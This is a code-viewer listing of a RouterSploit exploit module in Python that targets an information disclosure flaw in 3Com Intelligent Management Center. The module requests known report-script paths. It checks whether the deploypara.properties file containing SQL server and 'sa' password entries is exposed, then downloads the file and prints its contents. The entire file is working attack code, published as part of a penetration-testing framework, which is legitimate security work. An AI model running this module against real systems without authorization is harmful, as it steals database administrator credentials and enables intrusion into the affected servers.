/routersploit/modules/exploits/routers/3com/imc_info_disclosure.py

https://github.com/reverse-shell/routersploit · Python · 69 lines · 56 code · 13 blank · 0 comment · 9 complexity · c685262611b354abba55930c133b18d3 MD5 · raw file 

    

  1. from routersploit.core.exploit import *
    2. 

  2. from routersploit.core.http.http_client import HTTPClient
    3. 

  3. 

  4. 

  5. class Exploit(HTTPClient):
    6. 

  6.     __info__ = {
    7. 

  7.         "name": "3Com IMC Info Disclosure",
    8. 

  8.         "description": "Exploits 3Com Intelligent Management Center information disclosure vulnerability that allows to fetch credentials for SQL sa account",
    9. 

  9.         "authors": (
    10. 

  10.             "Richard Brain",  # vulnerability discovery
    11. 

  11.             "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
    12. 

  12.         ),
    13. 

  13.         "references": (
    14. 

  14.             "https://www.exploit-db.com/exploits/12680/",
    15. 

  15.         ),
    16. 

  16.         "devices": (
    17. 

  17.             "3Com Intelligent Management Center",
    18. 

  18.         ),
    19. 

  19.     }
    20. 

  20. 

  21.     target = OptIP("", "Target IPv4 or IPv6 address")
    22. 

  22.     port = OptPort(8080, "Target HTTP port")
    23. 

  23. 

  24.     def __init__(self):
    25. 

  25.         self.paths = [
    26. 

  26.             "/imc/reportscript/sqlserver/deploypara.properties",
    27. 

  27.             "/rpt/reportscript/sqlserver/deploypara.properties",
    28. 

  28.             "/imc/reportscript/oracle/deploypara.properties"
    29. 

  29.         ]
    30. 

  30. 

  31.         self.valid = None
    32. 

  32. 

  33.     def run(self):
    34. 

  34.         if self.check():
    35. 

  35.             print_success("Target seems to be vulnerable")
    36. 

  36. 

  37.             print_status("Sending request to download sensitive information")
    38. 

  38.             response = self.http_request(
    39. 

  39.                 method="GET",
    40. 

  40.                 path=self.valid,
    41. 

  41.             )
    42. 

  42. 

  43.             if response is None:
    44. 

  44.                 return
    45. 

  45. 

  46.             if response.status_code == 200 and len(response.text):
    47. 

  47.                 print_status("Reading {}".format(self.valid))
    48. 

  48.                 print_info(response.text)
    49. 

  49.             else:
    50. 

  50.                 print_error("Exploit failed - could not retrieve response")
    51. 

  51. 

  52.         else:
    53. 

  53.             print_error("Exploit failed - target seems to be not vulnerable")
    54. 

  54. 

  55.     @mute
    56. 

  56.     def check(self):
    57. 

  57.         for path in self.paths:
    58. 

  58.             response = self.http_request(
    59. 

  59.                 method="GET",
    60. 

  60.                 path=path,
    61. 

  61.             )
    62. 

  62.             if response is None:
    63. 

  63.                 continue
    64. 

  64. 

  65.             if any(map(lambda x: x in response.text, ["report.db.server.name", "report.db.server.sa.pass", "report.db.server.user.pass"])):
    66. 

  66.                 self.valid = path
    67. 

  67.                 return True  # target is vulnerable
    68. 

  68. 

  69.         return False  # target not vulnerable
    70.